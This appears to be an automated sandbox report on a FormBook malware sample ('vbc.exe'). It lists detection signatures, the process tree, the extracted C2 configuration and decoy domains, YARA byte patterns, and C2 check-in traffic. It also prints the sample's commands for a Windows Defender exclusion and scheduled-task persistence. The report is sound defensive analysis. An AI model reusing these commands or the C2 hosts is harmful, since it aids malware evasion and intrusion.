Windows Analysis Report vbc.exe

Overview

General Information

Sample Name: vbc.exe
Analysis ID: 518412
MD5: c4a1bdd685e346b7604f93357a922875
SHA1: 6b8fccadcf1977f5850faa1c47617343fafc0ff4
SHA256: 728b23f75c1140a1763dd7c75083f2ae57afeb6ffa3d7b33a9ba1b4904c4566d
Tags: exe, Xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Classification chart (labels only; the chart image is not reproduced): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious
  • System is w10x64
  • vbc.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\vbc.exe" MD5: C4A1BDD685E346B7604F93357A922875)
    • powershell.exe (PID: 6604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6624 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 6824 cmdline: C:\Users\user\Desktop\vbc.exe MD5: C4A1BDD685E346B7604F93357A922875)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 6756 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup
{
  "C2 list": [
    "www.septemberstockevent200.com/ht08/"
  ],
  "decoy": [
    "joye.club",
    "istanbulemlakgalerisi.online",
    "annikadaniel.love",
    "oooci.com",
    "curebase-test.com",
    "swisstradecenter.com",
    "hacticum.com",
    "centercodebase.com",
    "recbi56ni.com",
    "mmj0115.xyz",
    "sharpstead.com",
    "sprklbeauty.com",
    "progettogenesi.cloud",
    "dolinum.com",
    "amaroqadvisors.com",
    "traininig.com",
    "leewaysvcs.com",
    "nashhomesearch.com",
    "joy1263.com",
    "serkanyamac.com",
    "nursingprogramsforme.com",
    "huakf.com",
    "1w3.online",
    "watermountsteam.top",
    "tyralruutan.quest",
    "mattlambert.xyz",
    "xn--fiqs8sypgfujbl4a.xn--czru2d",
    "hfgoal.com",
    "587868.net",
    "noyoucantridemyonewheel.com",
    "riewesell.top",
    "expn.asia",
    "suplementarsas.com",
    "item154655544.com",
    "cdgdentists.com",
    "deboraverdian.com",
    "franquiciasexclusivas.tienda",
    "tminus-10.com",
    "psychoterapeuta-wroclaw.com",
    "coachingbywatson.com",
    "lknitti.net",
    "belenpison.agency",
    "facilitetec.com",
    "99077000.com",
    "thefitmog.com",
    "kinmanpowerwashing.com",
    "escueladelbuenamor.com",
    "getjoyce.net",
    "oilelm.com",
    "maikoufarm.com",
    "hespresso.net",
    "timothyschmallrealt.com",
    "knoxvilleraingutters.com",
    "roonkingagency.online",
    "trashwasher.com",
    "angyfoods.com",
    "yungbredda.com",
    "digipoint-entertainment.com",
    "shangduli.space",
    "kalaraskincare.com",
    "ktnsound.xyz",
    "miabellavita.com",
    "thenlpmentor.com",
    "marzhukov.com"
  ]
}
Source | Rule | Description | Author | Strings
00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(30 entries in this table; only the first entries are reproduced here)
Source | Rule | Description | Author | Strings
8.0.vbc.exe.400000.6.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.0.vbc.exe.400000.6.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.vbc.exe.400000.6.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
8.0.vbc.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.0.vbc.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(23 entries in this table; only the first entries are reproduced here)

Sigma Overview

System Summary:

Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe", ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp", ProcessId: 6624
Sigma detected: Powershell Defender Exclusion
Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe", ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe", ProcessId: 6604
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe", ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe", ProcessId: 6604
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132809649656072936.6604.DefaultAppDomain.powershell

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}
Yara detected FormBook
Source: Yara match, File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH, Avira URL Cloud: Label: phishing
Source: http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH, Avira URL Cloud: Label: phishing
Source: 8.0.vbc.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.vbc.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.vbc.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: vbc.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: vbc.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe
Source: Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
Source: Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\vbc.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.miabellavita.com
Source: C:\Windows\explorer.exe, Domain query: www.joye.club
Source: C:\Windows\explorer.exe, Domain query: www.maikoufarm.com
Source: C:\Windows\explorer.exe, Domain query: www.mmj0115.xyz
Source: C:\Windows\explorer.exe, Network Connect: 44.227.65.245 80
Source: C:\Windows\explorer.exe, Domain query: www.septemberstockevent200.com
Source: C:\Windows\explorer.exe, Domain query: www.watermountsteam.top
Source: C:\Windows\explorer.exe, Network Connect: 104.21.4.114 80
Source: C:\Windows\explorer.exe, Domain query: www.yungbredda.com
Source: C:\Windows\explorer.exe, Domain query: www.leewaysvcs.com
Source: C:\Windows\explorer.exe, Domain query: www.sharpstead.com
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe, Network Connect: 118.27.122.222 80
Source: C:\Windows\explorer.exe, Network Connect: 172.67.188.247 80
Source: C:\Windows\explorer.exe, Network Connect: 101.132.116.91 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.mmj0115.xyz
Source: DNS query: www.mattlambert.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.septemberstockevent200.com/ht08/
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.sharpstead.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.maikoufarm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.septemberstockevent200.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.joye.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.mmj0115.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.mmj0115.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.miabellavita.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.yungbredda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.mattlambert.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 44.227.65.245 44.227.65.245
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Tue, 09 Nov 2021 11:57:34 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6182ae77-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 09 Nov 2021 11:57:40 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 74 30 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ht08/ was not found on this server.</p></body></html>
